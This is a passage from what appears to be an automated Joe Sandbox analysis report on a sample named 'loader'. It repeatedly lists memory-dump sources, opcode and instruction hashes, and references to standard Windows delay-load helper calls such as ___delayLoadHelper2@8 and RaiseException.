               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 8895b57d9ce2d55a7fe5776cfc241726facfe7a2b06e8989ba7d57892508b6a3
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 8895b57d9ce2d55a7fe5776cfc241726facfe7a2b06e8989ba7d57892508b6a3
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 86c38c9ccb2e604287a32d7e3c7793c353c79fb451f0d956749b5b6050a50ca6
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 86c38c9ccb2e604287a32d7e3c7793c353c79fb451f0d956749b5b6050a50ca6
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 3e438330a201830fcaf86e0b873f19ba90b89629b066d1c3edbeb29832665dca
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 3e438330a201830fcaf86e0b873f19ba90b89629b066d1c3edbeb29832665dca
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 74bcfdbdd4e8e60fa2938ef0e66d12c9083575018bb8b29e6fccb236d31560ff
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 74bcfdbdd4e8e60fa2938ef0e66d12c9083575018bb8b29e6fccb236d31560ff
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 09037e9d58a72d683f9a1ae654bf5756628e88db815ce4a826a368904252c79c
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 09037e9d58a72d683f9a1ae654bf5756628e88db815ce4a826a368904252c79c
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9b8fe61bb9de12ce1521c52b87f1f68510b329dc83761604e23533553b5f878b
              • Instruction ID: 37cc8ecb8a869fbc4c97f384fcc12d91812eb41772c7d63f95992218303c9ed4
              • Opcode Fuzzy Hash: 9b8fe61bb9de12ce1521c52b87f1f68510b329dc83761604e23533553b5f878b
              • Instruction Fuzzy Hash: B5A0129126C0023CB00CB141BC12C7B020CC4D0B11330412AB00A90044674008860431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 7d831e192c7c08d1a7d132d1c458ebced66b17a6f3fe306f8e9fa50566a0bb22
              • Instruction ID: c14535d17ee58cde01651d2100bb0f4b68b0c98c5a59faddf15f49df7d63c97f
              • Opcode Fuzzy Hash: 7d831e192c7c08d1a7d132d1c458ebced66b17a6f3fe306f8e9fa50566a0bb22
              • Instruction Fuzzy Hash: D9A011A22AC003BCB00CB282BC22CBB020CC8C0B203308A2AB00A80088AB80088A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 14c0388bb6f58265cf40c3edfd584125961e8789045c1042435f8b9fb338de71
              • Instruction ID: c14535d17ee58cde01651d2100bb0f4b68b0c98c5a59faddf15f49df7d63c97f
              • Opcode Fuzzy Hash: 14c0388bb6f58265cf40c3edfd584125961e8789045c1042435f8b9fb338de71
              • Instruction Fuzzy Hash: D9A011A22AC003BCB00CB282BC22CBB020CC8C0B203308A2AB00A80088AB80088A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 62de4021b4a550882bc237b770aa7bb0eeb32814f3d9261e6866501bfaeba5c4
              • Instruction ID: c14535d17ee58cde01651d2100bb0f4b68b0c98c5a59faddf15f49df7d63c97f
              • Opcode Fuzzy Hash: 62de4021b4a550882bc237b770aa7bb0eeb32814f3d9261e6866501bfaeba5c4
              • Instruction Fuzzy Hash: D9A011A22AC003BCB00CB282BC22CBB020CC8C0B203308A2AB00A80088AB80088A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
               • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 6b2cc2cdd3a912863ea1148c7ab47b3b64b985e7403643316e26e852d5e4efc9
              • Instruction ID: c14535d17ee58cde01651d2100bb0f4b68b0c98c5a59faddf15f49df7d63c97f
              • Opcode Fuzzy Hash: 6b2cc2cdd3a912863ea1148c7ab47b3b64b985e7403643316e26e852d5e4efc9
              • Instruction Fuzzy Hash: D9A011A22AC003BCB00CB282BC22CBB020CC8C0B203308A2AB00A80088AB80088A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 68c65dfda5f66051ff3c615014a503714acc526401df41ff7348ffd7f31551ba
              • Instruction ID: c14535d17ee58cde01651d2100bb0f4b68b0c98c5a59faddf15f49df7d63c97f
              • Opcode Fuzzy Hash: 68c65dfda5f66051ff3c615014a503714acc526401df41ff7348ffd7f31551ba
              • Instruction Fuzzy Hash: D9A011A22AC003BCB00CB282BC22CBB020CC8C0B203308A2AB00A80088AB80088A0832
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9ea4c2d99a62b1a0a4e32c7997bee43f0d77287e460be8a6931d6054c3a638c4
              • Instruction ID: 68fa54e6eb0a47ed081253b166fb5ab12d326f957705840e615c4efc353d63d6
              • Opcode Fuzzy Hash: 9ea4c2d99a62b1a0a4e32c7997bee43f0d77287e460be8a6931d6054c3a638c4
              • Instruction Fuzzy Hash: 66A011AA2AC003BCB00C22083C0BCBA022CC0C2B20332883AF20BA0080AB800C8A0030
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 2e6f1df807239cc3260b30ed9a882b3a6ee63c10cd0b545468669207eb1136f8
              • Instruction ID: 68fa54e6eb0a47ed081253b166fb5ab12d326f957705840e615c4efc353d63d6
              • Opcode Fuzzy Hash: 2e6f1df807239cc3260b30ed9a882b3a6ee63c10cd0b545468669207eb1136f8
              • Instruction Fuzzy Hash: 66A011AA2AC003BCB00C22083C0BCBA022CC0C2B20332883AF20BA0080AB800C8A0030
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: f83ff0796f0f6b677147bd60fd9e69a4b51c7e7761b85825b7fa8f416cab6d80
              • Instruction ID: 68fa54e6eb0a47ed081253b166fb5ab12d326f957705840e615c4efc353d63d6
              • Opcode Fuzzy Hash: f83ff0796f0f6b677147bd60fd9e69a4b51c7e7761b85825b7fa8f416cab6d80
              • Instruction Fuzzy Hash: 66A011AA2AC003BCB00C22083C0BCBA022CC0C2B20332883AF20BA0080AB800C8A0030
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DBD5
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d76a3f97d3af30682b6ff692e15d67cf9e79a9a495d3db14674512c9974c3208
              • Instruction ID: 68fa54e6eb0a47ed081253b166fb5ab12d326f957705840e615c4efc353d63d6
              • Opcode Fuzzy Hash: d76a3f97d3af30682b6ff692e15d67cf9e79a9a495d3db14674512c9974c3208
              • Instruction Fuzzy Hash: 66A011AA2AC003BCB00C22083C0BCBA022CC0C2B20332883AF20BA0080AB800C8A0030
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DC36
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: be7b9268e83b7aee8e82eeddb2b30d1fb621891f68923a5f9e173cbdbf1ec7e8
              • Instruction ID: c0c62fa6efdf64fb9289846fec22cd2d5c856be8340e0bc11e7d5e3cb7f60936
              • Opcode Fuzzy Hash: be7b9268e83b7aee8e82eeddb2b30d1fb621891f68923a5f9e173cbdbf1ec7e8
              • Instruction Fuzzy Hash: 40A001AA6AD203BCF10C62557D56EBA022CC4D5B617718D3EB60AA4091AB806D8A9871
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DC36
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 04d926ed21722840ba70b37e191758ef23d5143b461e0e8e7e7e0641e8926a5d
              • Instruction ID: c0c62fa6efdf64fb9289846fec22cd2d5c856be8340e0bc11e7d5e3cb7f60936
              • Opcode Fuzzy Hash: 04d926ed21722840ba70b37e191758ef23d5143b461e0e8e7e7e0641e8926a5d
